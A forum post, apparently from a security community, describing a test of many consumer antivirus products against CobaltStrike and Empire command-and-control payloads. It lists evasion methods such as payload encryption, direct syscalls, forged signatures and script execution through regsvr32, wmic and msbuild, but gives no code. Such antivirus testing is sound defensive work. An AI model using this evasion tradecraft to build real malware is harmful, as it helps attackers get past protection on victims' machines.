Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
General Security Discussions
Turtle‘s Enhanced Realworld Tests ( updated )
Message
<blockquote data-quote="ShenguiTurmi" data-source="post: 1045049" data-attributes="member: 99409"><p>Previous Tests:</p><p>EP1&2 are not released here</p><p>EP3: <a href="https://malwaretips.com/threads/turtle%E2%80%98s-enhanced-realworld-test-updated.126546/post-1026903" target="_blank">45AVs VS CobaltStrike</a></p><p></p><p>Test result (√ means protection success, × means protection failure):</p><p>[ATTACH=full]276248[/ATTACH]</p><p></p><p>Test screenshots:</p><p>[URL unfurl="true"]https://ln5.sync.com/dl/0f7cf20a0/view/default/9160484270000#ivh45d3i-fd3zjvdn-3izds4wh-f7bc84zz[/URL]</p><p></p><p>Three years ago in the first issue, we tested the effectiveness of the Empire framework against personal security software (not released here). and six months ago, we tested the effectiveness of the CobaltStrike framework against personal security software (EP3).</p><p>Recently, I learned that many red teams do not rely heavily on these open source loaders, but have some pre-configured commercial solutions, and I decided to give it a try.</p><p>It just so happens that there is a commercial AV Bypass tool author who is willing to sponsor me for this test, and I thank him for the Bypass tool.</p><p>At the same time, a team took over Empire, which had stopped updating, and I decided to add the new version of Empire to the test to see if any security software had done a better job of defending it after the previous test.</p><p>As an experimental group, we used almost all the personal security software on the market to test and keep the default completely.</p><p></p><p>Our test will do the following:</p><p>1. download the payload to local</p><p>2. start the payload (may have a loader)</p><p>3. sample establish c2 connection (target server is public cloud server)</p><p>4. target machine online</p><p>5. Screenshot of the command issued by C2</p><p>6. C2 sends a command to obtain a txt file of the c drive (simulated data theft)</p><p>If the security software in any step of the following process in any way (including static scanning / HEUR / firewall block c&c, etc.) to block, the defense is considered successful, only after all steps are executed still no action is considered a failure.</p><p></p><p>We prepared 10 samples for this test, divided into Scenario-A (CobaltStrike) and Scenario-B (Empire):</p><p>Scenario-A sample 1: based on CobaltStrike, using XOR encrypted payload, using direct syscalls to replace the original dependencies, packaged as .Net executable file.</p><p>Scenario-A sample 2: Based on CobaltStrike, using HEX to obfuscate the payload, using direct syscalls to replace the original dependencies, with a fake digital signature, packaged as a .Net executable file.</p><p>Scenario-A sample 3: CobaltStrike based, AES encrypted payload, ConfuserEX obfuscated, packaged as .Net executable file.</p><p>Scenario-A sample 4: CobaltStrike based, XOR encrypted payload with a forged digital signature, compiled into an executable using LLVM.</p><p>Scenario-A sample 5: CobaltStrike based, using XOR encrypted payload, using Shikata-Ga-Nai obfuscation, compiled to executable using LLVM</p><p>Scenario-B sample 1: Based on Empire, simulating Ducky/Teensy BadUSB, using keystrokes to execute Powershell payload, no binary landing</p><p>Scenario-B sample 2: Based on Empire, packaged as XSL file and executed by wmic with Powershell payload, no binary landing.</p><p>Scenario-B sample 3: Based on Empire, packaged as SCT script, Powershell payload executed by regsvr32, no binary landing.</p><p>Scenario-B sample 4: Based on Empire, packaged as VBS script, Powershell payload executed by scripthost, no binary landing</p><p>Scenario-B sample 5: Based on Empire, packaged as XML file, Powershell payload executed by msbuild, no binary landing.</p></blockquote><p></p>
[QUOTE="ShenguiTurmi, post: 1045049, member: 99409"] Previous Tests: EP1&2 are not released here EP3: [URL='https://malwaretips.com/threads/turtle%E2%80%98s-enhanced-realworld-test-updated.126546/post-1026903']45AVs VS CobaltStrike[/URL] Test result (√ means protection success, × means protection failure): [ATTACH type="full" alt="result-ep4.png"]276248[/ATTACH] Test screenshots: [URL unfurl="true"]https://ln5.sync.com/dl/0f7cf20a0/view/default/9160484270000#ivh45d3i-fd3zjvdn-3izds4wh-f7bc84zz[/URL] Three years ago in the first issue, we tested the effectiveness of the Empire framework against personal security software (not released here). and six months ago, we tested the effectiveness of the CobaltStrike framework against personal security software (EP3). Recently, I learned that many red teams do not rely heavily on these open source loaders, but have some pre-configured commercial solutions, and I decided to give it a try. It just so happens that there is a commercial AV Bypass tool author who is willing to sponsor me for this test, and I thank him for the Bypass tool. At the same time, a team took over Empire, which had stopped updating, and I decided to add the new version of Empire to the test to see if any security software had done a better job of defending it after the previous test. As an experimental group, we used almost all the personal security software on the market to test and keep the default completely. Our test will do the following: 1. download the payload to local 2. start the payload (may have a loader) 3. sample establish c2 connection (target server is public cloud server) 4. target machine online 5. Screenshot of the command issued by C2 6. C2 sends a command to obtain a txt file of the c drive (simulated data theft) If the security software in any step of the following process in any way (including static scanning / HEUR / firewall block c&c, etc.) to block, the defense is considered successful, only after all steps are executed still no action is considered a failure. We prepared 10 samples for this test, divided into Scenario-A (CobaltStrike) and Scenario-B (Empire): Scenario-A sample 1: based on CobaltStrike, using XOR encrypted payload, using direct syscalls to replace the original dependencies, packaged as .Net executable file. Scenario-A sample 2: Based on CobaltStrike, using HEX to obfuscate the payload, using direct syscalls to replace the original dependencies, with a fake digital signature, packaged as a .Net executable file. Scenario-A sample 3: CobaltStrike based, AES encrypted payload, ConfuserEX obfuscated, packaged as .Net executable file. Scenario-A sample 4: CobaltStrike based, XOR encrypted payload with a forged digital signature, compiled into an executable using LLVM. Scenario-A sample 5: CobaltStrike based, using XOR encrypted payload, using Shikata-Ga-Nai obfuscation, compiled to executable using LLVM Scenario-B sample 1: Based on Empire, simulating Ducky/Teensy BadUSB, using keystrokes to execute Powershell payload, no binary landing Scenario-B sample 2: Based on Empire, packaged as XSL file and executed by wmic with Powershell payload, no binary landing. Scenario-B sample 3: Based on Empire, packaged as SCT script, Powershell payload executed by regsvr32, no binary landing. Scenario-B sample 4: Based on Empire, packaged as VBS script, Powershell payload executed by scripthost, no binary landing Scenario-B sample 5: Based on Empire, packaged as XML file, Powershell payload executed by msbuild, no binary landing. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
